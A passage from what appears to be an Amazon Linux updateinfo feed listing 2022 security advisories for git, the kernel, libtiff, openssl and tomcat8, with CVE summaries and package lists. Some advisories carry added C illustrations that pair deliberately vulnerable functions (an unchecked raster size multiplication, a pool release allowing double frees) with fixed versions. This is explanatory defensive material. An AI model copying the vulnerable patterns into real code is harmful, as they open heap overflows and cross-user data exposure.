epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.33.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2022-1623</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1623: medium priority package update for git</title><issued date="2022-07-28 20:36:00" /><updated date="2022-08-04 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-29187:
A vulnerability was found in Git. This flaw occurs due to Git not checking the ownership of directories in a local multi-user system when running commands specified in the local repository configuration. This issue allows the owner of the repository to cause arbitrary commands to be executed by other users who access the repository.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29187" title="" id="CVE-2022-29187" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-hg" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-subtree" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-subtree-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-core" version="2.37.1" release="1.76.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/git-core-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="emacs-git-el" version="2.37.1" release="1.76.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.37.1-1.76.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.37.1" release="1.76.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.37.1-1.76.amzn1.x86_64.rpm</filename></package><package name="git-instaweb" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-subtree-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git" version="2.37.1" release="1.76.amzn1" epoch="0" 
arch="i686"><filename>Packages/git-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-core" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.37.1-1.76.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.37.1" release="1.76.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.37.1-1.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1624</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1624: important priority package update for kernel</title><issued date="2022-07-28 20:37:00" /><updated date="2022-08-04 22:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-33744:
Arm guests can cause Dom0 DoS via PV devices. When mapping pages of guests on Arm, dom0 uses an rbtree to keep track of the foreign mappings. Updating that rbtree is not always done completely with the related lock held, which leaves a small race window that unprivileged guests can use, via PV devices, to make the rbtree inconsistent. These inconsistencies can lead to Denial of Service (DoS) of dom0, e.g. by causing crashes or the inability to perform further mappings of other guests' memory pages.
CVE-2022-33742:
Linux disk/nic frontends data leaks. [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally, the granularity of the grant table doesn't allow sharing less than a 4K page, so unrelated data residing in the same 4K page as data shared with a backend is accessible to that backend (CVE-2022-33741, CVE-2022-33742). This entry is one of the two grant-granularity CVEs.
CVE-2022-33741:
Linux disk/nic frontends data leaks. [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally, the granularity of the grant table doesn't allow sharing less than a 4K page, so unrelated data residing in the same 4K page as data shared with a backend is accessible to that backend (CVE-2022-33741, CVE-2022-33742). This entry is one of the two grant-granularity CVEs.
CVE-2022-33740:
Linux disk/nic frontends data leaks. [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally, the granularity of the grant table doesn't allow sharing less than a 4K page, so unrelated data residing in the same 4K page as data shared with a backend is accessible to that backend (CVE-2022-33741, CVE-2022-33742). This entry is one of the two missing-zeroing CVEs.
CVE-2022-26365:
Linux disk/nic frontends data leaks. [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Linux Block and Network PV device frontends don't zero memory regions before sharing them with the backend (CVE-2022-26365, CVE-2022-33740). Additionally, the granularity of the grant table doesn't allow sharing less than a 4K page, so unrelated data residing in the same 4K page as data shared with a backend is accessible to that backend (CVE-2022-33741, CVE-2022-33742). This entry is one of the two missing-zeroing CVEs.
CVE-2022-2318:
Use-after-free vulnerabilities in the timer handlers of net/rose/rose_timer.c in the Linux kernel allow an attacker without any privileges to crash the kernel.
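Added illustration, not Linux or Xen code: a C model of the two invariants a PV frontend needs for the four Xen frontend CVEs above. A buffer handed to a backend must be zeroed first (the CVE-2022-26365 and CVE-2022-33740 aspect) and must consist of whole, page-aligned pages (the CVE-2022-33741 and CVE-2022-33742 aspect), because a grant covers an entire 4K page and the backend can read all of it. The 4K PAGE_SIZE, the function names and the reject-rather-than-round policy are this example's assumptions.
<![CDATA[
```c
/* Added example, not Linux or Xen source. Models what a PV frontend must
 * guarantee for a region it grants to a backend:
 *  - zero it before sharing (CVE-2022-26365, CVE-2022-33740 aspect);
 *  - share only whole, page-aligned pages, since a grant is a full 4K page
 *    and the backend sees everything in it (CVE-2022-33741, CVE-2022-33742).
 */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define PAGE_SIZE 4096u   /* assumption: 4K pages, as in the advisory text */

struct grant_region {
    void  *base;
    size_t npages;
};

/* Prepare a region for granting. Returns 0 on success, -1 if the buffer
 * would expose bytes that belong to something else. */
static int share_region(struct grant_region *g, void *buf, size_t len)
{
    if (buf == NULL || len == 0)
        return -1;
    if ((uintptr_t)buf % PAGE_SIZE != 0)
        return -1;               /* starts mid-page: page neighbours would leak */
    if (len % PAGE_SIZE != 0)
        return -1;               /* tail of the last page belongs to someone else */
    memset(buf, 0, len);         /* stale contents (keys, other guests' data) gone */
    g->base = buf;
    g->npages = len / PAGE_SIZE;
    return 0;
}

/* Correct allocation for a shared ring or bounce buffer: dedicated pages. */
static void *alloc_shared_pages(size_t npages)
{
    void *p = NULL;
    if (npages == 0 || npages > SIZE_MAX / PAGE_SIZE)
        return NULL;
    if (posix_memalign(&p, PAGE_SIZE, npages * PAGE_SIZE) != 0)
        return NULL;
    return p;
}

/* The anti-pattern: a ring embedded next to private state. Granting `ring`
 * would hand the backend `secret` too, since both sit in one page. */
struct driver_state {
    unsigned char secret[64];
    unsigned char ring[512];
};

/* Helper: number of non-zero bytes in a region (0 once properly zeroed). */
static size_t count_nonzero(const void *p, size_t len)
{
    const unsigned char *b = p;
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (b[i] != 0) n++;
    return n;
}
```
]]>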
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2318" title="" id="CVE-2022-2318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26365" title="" id="CVE-2022-26365" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33740" title="" id="CVE-2022-33740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33741" title="" id="CVE-2022-33741" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33742" title="" id="CVE-2022-33742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33744" title="" id="CVE-2022-33744" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" 
version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.287" release="148.504.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.287-148.504.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" 
version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.287-148.504.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.287" release="148.504.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.287-148.504.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1625</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1625: medium priority package update for libtiff</title><issued date="2022-07-28 20:38:00" /><updated date="2022-08-04 22:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-22844:
A buffer overflow vulnerability was found in libtiff. This flaw allows an attacker with network access to pass specially crafted files, causing an application to halt or crash. The root cause is the memcpy() call in tif_unix.c.
CVE-2022-0924:
A heap buffer overflow flaw was found in LibTIFF's cpContigBufToSeparateBuf() function in tiffcp.c. This flaw allows an attacker with a crafted TIFF file to trigger a heap out-of-bounds read, causing a crash that leads to a denial of service.
CVE-2022-0909:
A floating-point exception (FPE) flaw was found in LibTIFF's computeOutputPixelOffsets() function in tiffcrop.c. This flaw allows an attacker with a crafted TIFF file to trigger a divide-by-zero error, causing a crash that leads to a denial of service.
CVE-2022-0908:
A flaw was found in LibTIFF where a NULL source pointer is passed to memcpy() within TIFFFetchNormalTag() in tif_dirread.c. This flaw allows an attacker with a crafted TIFF file to cause a crash that leads to a denial of service.
CVE-2022-0907:
A NULL pointer dereference flaw was found in Libtiff. This flaw allows an attacker with a crafted TIFF file to cause a crash that leads to a denial of service.
CVE-2022-0865:
A reachable assertion failure was found in libtiff's JBIG functionality. This flaw allows an attacker who can submit a crafted file to an application linked with libtiff and using the JBIG functionality to cause a crash via an assertion failure, leading to a denial of service. The exact mechanism and conditions around this issue depend on how the application uses libtiff.
CVE-2022-0562:
A flaw was found in libtiff where a NULL source pointer is passed to memcpy() within TIFFReadDirectory() in tif_dirread.c. An attacker can exploit this via a crafted TIFF file, causing a crash and leading to a denial of service.
CVE-2022-0561:
A flaw was found in libtiff where a NULL source pointer is passed to memcpy() within TIFFFetchStripThing() in tif_dirread.c. An attacker with a crafted TIFF file can exploit this flaw, causing a crash and leading to a denial of service.
CVE-2020-35524:
A heap-based buffer overflow flaw was found in libtiff in the handling of TIFF images in libtiff's TIFF2PDF tool. A specially crafted TIFF file can lead to arbitrary code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2020-35523:
An integer overflow flaw was found in libtiff that exists in the tif_getimage.c file. This flaw allows an attacker to inject and execute arbitrary code when a user opens a crafted TIFF file. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
CVE-2020-35522:
In LibTIFF, an unchecked memory allocation (malloc) failure in tif_pixarlog.c means a crafted TIFF document can lead to an abort, resulting in a remote denial of service.
CVE-2020-35521:
A flaw was found in libtiff. Due to a memory allocation failure in tif_read.c, a crafted TIFF file can lead to an abort, resulting in denial of service.
CVE-2016-9532:
Integer overflow in the writeBufferToSeparateStrips function in tiffcrop.c in LibTIFF before 4.0.7 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted tif file.
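Added illustration, not LibTIFF code: C for two defect classes that recur in the list above. The raster sizing shows the integer-overflow-to-heap-overflow pattern (the CVE-2020-35523 and CVE-2016-9532 class), first as the unchecked 32-bit product and then with an overflow-checked size computation; copy_tag_value() shows the guarded form of the memcpy() calls with a NULL source (the CVE-2022-0561, CVE-2022-0562 and CVE-2022-0908 class). Function names and parameter layout are this example's own.
<![CDATA[
```c
/* Added example, not LibTIFF source. Two defect classes from the advisory:
 *  - an image raster sized by width*height*bytes_per_pixel in 32-bit
 *    arithmetic, which wraps and yields a buffer smaller than the decoder
 *    then writes (integer overflow to heap overflow, CVE-2020-35523 class);
 *  - memcpy() with a NULL source because a directory entry claimed zero
 *    bytes (CVE-2022-0561, CVE-2022-0562, CVE-2022-0908 class).
 */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable pattern: the product silently wraps modulo 2^32. */
static uint32_t raster_bytes_vuln(uint32_t width, uint32_t height, uint32_t bpp)
{
    return width * height * bpp;
}

/* Overflow-checked multiply: 0 on success with *out set, -1 on overflow. */
static int mul_checked(size_t a, size_t b, size_t *out)
{
    if (a != 0 && b > SIZE_MAX / a)
        return -1;
    *out = a * b;
    return 0;
}

/* Fixed pattern: size_t arithmetic, every step checked, zero dimensions
 * rejected (a zero-sized raster is never a valid image either). */
static int raster_bytes(uint32_t width, uint32_t height, uint32_t bpp, size_t *bytes)
{
    size_t pixels;
    if (width == 0 || height == 0 || bpp == 0)
        return -1;
    if (mul_checked(width, height, &pixels) != 0)
        return -1;
    return mul_checked(pixels, bpp, bytes);
}

/* Allocate the raster only when the size computation is sound. */
static void *alloc_raster(uint32_t width, uint32_t height, uint32_t bpp)
{
    size_t n;
    if (raster_bytes(width, height, bpp, &n) != 0)
        return NULL;
    return malloc(n);
}

/* Guarded copy of a tag payload. memcpy(dst, NULL, n) is undefined even for
 * n == 0, and the on-disk count is attacker controlled, so both the pointer
 * and the length are validated against the destination. Returns bytes copied. */
static size_t copy_tag_value(void *dst, size_t dst_len, const void *src, size_t count)
{
    if (dst == NULL || src == NULL || count == 0)
        return 0;
    if (count > dst_len)
        count = dst_len;
    memcpy(dst, src, count);
    return count;
}
```
]]>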
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9532" title="" id="CVE-2016-9532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35521" title="" id="CVE-2020-35521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35522" title="" id="CVE-2020-35522" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35523" title="" id="CVE-2020-35523" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35524" title="" id="CVE-2020-35524" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0561" title="" id="CVE-2022-0561" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0562" title="" id="CVE-2022-0562" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0865" title="" id="CVE-2022-0865" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0907" title="" id="CVE-2022-0907" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0908" title="" id="CVE-2022-0908" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0909" title="" id="CVE-2022-0909" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0924" title="" id="CVE-2022-0924" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22844" title="" id="CVE-2022-22844" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff" version="4.0.3" release="35.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.38.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.38.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.38.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.38.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.38.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.38.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.38.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.38.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.38.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.38.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.38.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.38.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1626</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1626: medium priority package update for openssl</title><issued date="2022-07-28 20:38:00" /><updated date="2022-08-04 22:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-2068:
A flaw was found in OpenSSL. The fix for CVE-2022-1292 did not find other places in the `c_rehash` script where it possibly passed the file names of certificates being hashed to a command executed through the shell. Some operating systems distribute this script in a manner where it is automatically executed. On these operating systems, this flaw allows an attacker to execute arbitrary commands with the privileges of the script.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068" title="" id="CVE-2022-2068" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.159.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.159.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.159.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.159.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.159.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.159.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.159.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.159.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1627</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1627: important priority package update for tomcat8</title><issued date="2022-07-28 20:39:00" /><updated date="2022-08-04 22:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-29885:
The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks.
CVE-2022-25762:
A flaw was found in the tomcat package. When a web application sends a WebSocket message concurrently with the WebSocket connection closing, the application may continue to use the socket after it has been closed. In this case, the error handling triggered could cause the pooled object to be placed in the pool twice. This issue results in subsequent connections using the same object concurrently, which causes data to be potentially returned to the wrong user or application stability issues.
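Added illustration, not Tomcat code: a small C object pool that models the CVE-2022-25762 failure. When the close path and the error path both return the same object, a release() that does not track what is checked out pushes it onto the free list twice, and the next two borrowers receive the same object; the fixed release() records checked-out slots and rejects the second return. Pool size and function names are this example's assumptions.
<![CDATA[
```c
/* Added example, not Tomcat source. A fixed-size object pool that models the
 * CVE-2022-25762 failure: when the connection-close path and the error path
 * both return the same object, a release() that does not track checked-out
 * objects pushes it onto the free list twice, and the next two borrowers get
 * the same object. Whatever one writes, the other reads. */
#include <stdbool.h>

#define POOL_SIZE 4

struct pool {
    int  free_stack[POOL_SIZE + 1];  /* one spare slot so the buggy release cannot overrun */
    int  nfree;
    bool checked_out[POOL_SIZE];
};

static void pool_init(struct pool *p)
{
    p->nfree = 0;
    for (int i = 0; i < POOL_SIZE; i++) {
        p->checked_out[i] = false;
        p->free_stack[p->nfree++] = i;
    }
}

/* Hand out an object index, or -1 when the pool is exhausted. */
static int pool_borrow(struct pool *p)
{
    if (p->nfree == 0)
        return -1;
    int i = p->free_stack[--p->nfree];
    p->checked_out[i] = true;
    return i;
}

/* Vulnerable: trusts that every release matches exactly one borrow. */
static void pool_release_vuln(struct pool *p, int i)
{
    if (i < 0 || i >= POOL_SIZE || p->nfree > POOL_SIZE)
        return;
    p->checked_out[i] = false;
    p->free_stack[p->nfree++] = i;
}

/* Fixed: releasing an object that is not checked out is an error, not a
 * second free-list entry. In a threaded pool this test-and-clear must run
 * under the pool lock or as an atomic exchange. Returns 0 or -1. */
static int pool_release_fixed(struct pool *p, int i)
{
    if (i < 0 || i >= POOL_SIZE || !p->checked_out[i])
        return -1;
    p->checked_out[i] = false;
    p->free_stack[p->nfree++] = i;
    return 0;
}
```
]]>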
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25762" title="" id="CVE-2022-25762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29885" title="" id="CVE-2022-29885" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-jsp-2.3-api" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.81" release="1.91.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.81-1.91.amzn1.noarch.rpm</filename></package><package 